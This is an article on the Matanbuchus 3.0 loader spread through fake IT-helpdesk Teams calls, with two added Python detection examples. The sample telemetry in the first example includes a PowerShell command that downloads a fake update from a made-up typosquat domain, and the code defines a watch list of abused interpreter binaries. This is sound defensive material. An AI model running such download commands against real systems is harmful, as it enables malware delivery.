Microsoft Teams Malware Attack

Cybercriminals have deployed a sophisticated new variant of malware that exploits Microsoft Teams communications to infiltrate corporate networks, leveraging the trusted nature of internal collaboration platforms to bypass traditional security measures.

The attackers use Matanbuchus 3.0, a malware-as-a-service loader that marks a notable advance over its 2021 predecessor: it adds stronger encryption and more sophisticated evasion techniques designed to circumvent modern endpoint security solutions.

The attack methodology involves cybercriminals impersonating IT helpdesk personnel during Microsoft Teams calls, exploiting employees’ inherent trust in internal communication channels. During these fraudulent sessions, attackers initiate Quick Assist tools to execute remote scripts that install the malicious loader. They distribute weaponized ZIP archives masquerading as legitimate software updates, particularly targeting applications like Notepad++, while utilizing cybersquatting domains to improve the perceived authenticity of these fabricated updates.
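The chain described above leaves two observable traces on the endpoint: a Quick Assist session followed shortly by interpreter or installer execution on the same host, and a download from a domain that imitates a legitimate update site. The following is an added example, not code from the article or from any vendor, that correlates constructed process-creation events to flag both. It assumes the Quick Assist process image is named QuickAssist.exe and that your telemetry records image, parent image and command line per process start (Sysmon Event ID 1 style); the look-alike domain in the sample data is constructed for the example and is not an indicator from the article.

```python
"""Added example: correlate process-creation events to flag script or
installer execution during a Quick Assist session and downloads from
look-alike update domains. All event records below are constructed."""
from dataclasses import dataclass
from datetime import datetime, timedelta
import re

# Assumption: Quick Assist runs as QuickAssist.exe; adjust to your telemetry.
QUICK_ASSIST_IMAGE = "quickassist.exe"
# Interpreters/installers matching the payload formats the article lists
# (PowerShell, MSI, DLL via rundll32/regsvr32, EXE via cmd).
SUSPICIOUS_CHILDREN = {"powershell.exe", "cmd.exe", "msiexec.exe", "rundll32.exe",
                       "regsvr32.exe", "wscript.exe", "mshta.exe"}
# Legitimate update hosts a cybersquatting domain would imitate (Notepad++ is
# served from notepad-plus-plus.org and GitHub releases).
LEGIT_DOMAINS = {"notepad-plus-plus.org", "github.com"}
SESSION_WINDOW = timedelta(minutes=30)   # how long after Quick Assist starts we stay alert
DOMAIN_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)


@dataclass
class ProcEvent:
    ts: datetime
    host: str
    image: str
    parent_image: str
    cmdline: str


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike(domain: str):
    """Return the legitimate domain this one imitates, or None if it is legitimate
    (exact match or a real subdomain) or unrelated."""
    d = domain.lower().rstrip(".")
    for legit in LEGIT_DOMAINS:
        if d == legit or d.endswith("." + legit):
            return None
    for legit in LEGIT_DOMAINS:
        brand = legit.split(".")[0]
        if edit_distance(d, legit) <= 2 or brand in d:
            return legit
    return None


def correlate(events):
    """Yield (host, rule, detail) alerts from a batch of process-creation events."""
    alerts = []
    last_quick_assist = {}            # host -> time Quick Assist last started
    for ev in sorted(events, key=lambda e: e.ts):
        image = ev.image.rsplit("\\", 1)[-1].lower()
        if image == QUICK_ASSIST_IMAGE:
            last_quick_assist[ev.host] = ev.ts
        if image in SUSPICIOUS_CHILDREN:
            started = last_quick_assist.get(ev.host)
            if started is not None and ev.ts - started <= SESSION_WINDOW:
                alerts.append((ev.host, "script_during_quick_assist", image))
        for dom in DOMAIN_RE.findall(ev.cmdline):
            legit = lookalike(dom)
            if legit:
                alerts.append((ev.host, "lookalike_update_domain", f"{dom} ~ {legit}"))
    return alerts


# Constructed sample telemetry (not real logs); the domain is a made-up typosquat.
T0 = datetime(2025, 7, 1, 10, 0)
SAMPLE_EVENTS = [
    ProcEvent(T0, "WS01", r"C:\Program Files\WindowsApps\...\QuickAssist.exe",
              r"C:\Windows\explorer.exe", "QuickAssist.exe"),
    ProcEvent(T0 + timedelta(minutes=5), "WS01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              'powershell.exe -c "iwr https://notepad-plus-p1us.org/npp-update.zip"'),
    ProcEvent(T0 + timedelta(minutes=10), "WS01", r"C:\Windows\System32\msiexec.exe",
              r"C:\Windows\explorer.exe", "msiexec.exe /i npp-update.msi"),
    ProcEvent(T0 + timedelta(hours=1, minutes=30), "WS02",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe", r"powershell.exe -File C:\scripts\inventory.ps1"),
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

WS02's scheduled PowerShell run produces nothing because no Quick Assist session preceded it; WS01 produces two session alerts and one domain alert. The 30-minute window and the two-character edit-distance threshold are tunable starting points, not values from the article.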

With an average detection time of 191 days for such sophisticated attacks, organizations often remain vulnerable for extended periods before discovering the compromise.

Matanbuchus 3.0 demonstrates considerable technical sophistication by encrypting its command-and-control communications with Salsa20 using 256-bit keys, so that network monitoring systems cannot inspect the traffic's contents.

The malware employs advanced obfuscation techniques, in-memory execution, and indirect system calls that greatly complicate detection by endpoint detection and response solutions. The loader also queries system information using WQL (WMI Query Language), allowing the operators to tailor the attack to each victim environment.
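Because the C2 channel is encrypted, network defenders cannot match on payload contents and have to fall back on metadata: a loader checking in on a timer produces machine-regular inter-arrival times, and an opaque stream of bytes on a port that does not carry a recognisable protocol header has near-maximal entropy. The following is an added example, not code from the article or any vendor, that scores constructed flow records on both properties. It assumes per-connection records with a timestamp, endpoints, destination port and a payload sample; the thresholds are illustrative.

```python
"""Added example: flag encrypted, beacon-like flows by payload entropy and
inter-arrival regularity instead of content. Flow records are constructed."""
import math
from collections import defaultdict


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 means every byte value is equally likely."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_like_tls(payload: bytes) -> bool:
    """TLS records start with content type 0x16 (handshake) and version 0x03xx."""
    return len(payload) >= 3 and payload[0] == 0x16 and payload[1] == 0x03


def beacon_score(timestamps):
    """Coefficient of variation of inter-arrival gaps; low values mean a timer,
    high values mean a human. None when there are too few samples to judge."""
    if len(timestamps) < 4:
        return None
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    mean = sum(gaps) / len(gaps)
    if mean == 0:
        return None
    var = sum((g - mean) ** 2 for g in gaps) / len(gaps)
    return math.sqrt(var) / mean


def analyze(flows, entropy_threshold=7.5, jitter_threshold=0.15):
    """Group flows by (src, dst, dport) and report pairs that are both opaque
    (high entropy, no TLS header) and regular (low jitter)."""
    by_pair = defaultdict(list)
    for f in flows:
        by_pair[(f["src"], f["dst"], f["dport"])].append(f)
    findings = []
    for key, group in by_pair.items():
        group.sort(key=lambda f: f["ts"])
        combined = b"".join(f["payload"] for f in group)
        ent = shannon_entropy(combined)
        cv = beacon_score([f["ts"] for f in group])
        opaque = ent >= entropy_threshold and not any(looks_like_tls(f["payload"]) for f in group)
        regular = cv is not None and cv <= jitter_threshold
        if opaque and regular:
            findings.append({"pair": key, "entropy": round(ent, 2), "jitter": round(cv, 3)})
    return findings


# Constructed sample flows using documentation address ranges (RFC 5737).
OPAQUE = bytes(range(256))                       # stand-in for an encrypted blob
TLS_HELLO = b"\x16\x03\x01" + bytes(range(253))   # stand-in for a TLS handshake
HTTP_TEXT = b"GET / HTTP/1.1\r\nHost: intranet.example\r\n\r\n"

SAMPLE_FLOWS = (
    # timer-driven check-ins to an unusual port, opaque payload: the beacon
    [{"ts": t, "src": "10.0.0.5", "dst": "203.0.113.10", "dport": 8080, "payload": OPAQUE}
     for t in (0, 60, 121, 179, 240, 301)]
    # ordinary browsing: irregular timing and a TLS header, so excluded
    + [{"ts": t, "src": "10.0.0.5", "dst": "198.51.100.7", "dport": 443, "payload": TLS_HELLO}
       for t in (0, 7, 95, 96, 400)]
    # regular but plaintext polling: low entropy, so excluded
    + [{"ts": t, "src": "10.0.0.6", "dst": "198.51.100.8", "dport": 80, "payload": HTTP_TEXT}
       for t in (0, 60, 120, 180)]
)

if __name__ == "__main__":
    for finding in analyze(SAMPLE_FLOWS):
        print(finding)
```

Only the 8080 pair is reported: it is both opaque and metronomic. Real loaders add random sleep jitter, so the jitter threshold should be set from a baseline of your own traffic rather than taken from this example.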

The primary function of Matanbuchus 3.0 centers on delivering secondary payloads, including ransomware, credential stealers, banking Trojans, and Cobalt Strike frameworks.

The loader supports multiple execution formats, encompassing DLL, EXE, MSI files, shellcode, and PowerShell command reverse shells, providing attackers with extensive flexibility in payload deployment. The malware can hollow processes for stealthier execution while maintaining its ability to spawn processes for lateral movement across compromised networks.

This versatility lets operators establish persistent network access that survives system reboots and user logouts, so that the attackers retain control of infected systems even after initial detection attempts.

The exploitation of Microsoft Teams represents a strategic shift toward targeting internal collaboration platforms, effectively bypassing email security controls that traditionally serve as primary defensive barriers.

This approach capitalizes on the real-time, internal nature of Teams communications, reducing user suspicion while increasing infection success rates.

The attacks often function within broader initial access broker schemes, where compromised network access is later sold to other criminal organizations for further exploitation.
